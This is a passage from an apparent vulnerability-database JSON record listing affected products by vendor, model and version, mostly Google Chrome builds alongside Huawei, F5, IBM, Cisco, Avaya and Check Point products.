0.3, "vendor": "google", "version": "30.0.1599.39" }, { "model": "oceanstor s5500t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.530.0" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": null, "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2053-4240" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.58" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.122" }, { "model": "key vault", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.59" }, { "model": "database appliance", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.57" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "cloudsystem enterprise software", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8.1.2" }, { "model": "junos space ja1500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "horizon workspace", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.8" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "move antivirus agentless", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.2" }, { "model": "oceanstor dorado g2 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "2100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1308.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.633.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "download server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.769.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.127" }, { "model": "gaia embedded r75.40vs", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.785.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.225" }, { "model": "secureplatform r77.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.385.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.319.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.908.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.204" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.62" }, { "model": "oceanstor s5600 v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.219" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.374.0" }, { "model": "email gateway patch", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.52" }, { "model": "secureplatform r77", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.86" }, { "model": "secureplatform r75.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.40" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1043" }, { "model": "rack server rh2288 v100r002c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.8" }, { "model": "move antivirus agentless", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.604.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.44" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.35" }, { "model": "secureplatform r70", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.150" }, { "model": "gaia embedded r71.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "vcenter orchestrator appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.756.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.34" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.886.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.123" }, { "model": "ipso r75.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "worklight quality assurance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2" }, { "model": "oceanstor s2200t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.51" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "gaia embedded r77.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.233" }, { "model": "nvp", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.88" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "oceanstor s6800t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.955.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1082.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.760.0" }, { "model": "secure access link", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.110" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.12" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "email gateway patch", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1658.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.368.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.23" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.594.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.118" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "gaia embedded r75.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.743.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.8" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.2" }, { "model": "finesse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.96365" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.83" }, { "model": "2054-e01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.816.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.88" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.13" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.393.0" }, { "model": "e9000 blade server ch140 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.362.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.618.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.628.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.56" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.815.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.423.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.8" }, { "model": "system storage san80b-4 2498-b80", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.802.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.12" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.46" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.5" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "oceanstor s5500t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.323.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.804.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.77" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.370.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.95" }, { "model": "espace uc v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.805.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.789.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.315" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.512.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.901.0" }, { "model": "t520 flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "gaia r75.46", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura application server sip core pb23", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.0" }, { "model": "associates api management", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.729.0" }, { "model": "secureplatform r75.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.102" }, { "model": "isoc v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.15" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "8700" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.483.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.467.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.200" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.10" }, { "model": "secureplatform r70.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.25" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.0" }, { "model": "qip", "scope": "eq", "trust": 0.3, "vendor": "alcatel lucent", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.452.1" }, { "model": "ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "1.5" }, { "model": "e9000 blade server ch242 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1017" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.727.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.748.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.7" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.89" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.1.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.379.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.654.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.72" }, { "model": "oceanstor s5500t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4" }, { "model": "rack server rh2285h v100r002c", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.8" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.73" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.334.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.862.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.37" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.303" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.721.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.0" }, { "model": "system storage san384b-2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2499-416" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1030" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.132" }, { "model": "uma-db v100r001c00spc302", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.336" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.32" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.211" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.602.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.2" }, { "model": "2054-e04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "virtualization provisioning service", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "espace usm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1058.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.415.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.931.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.722.0" }, { "model": 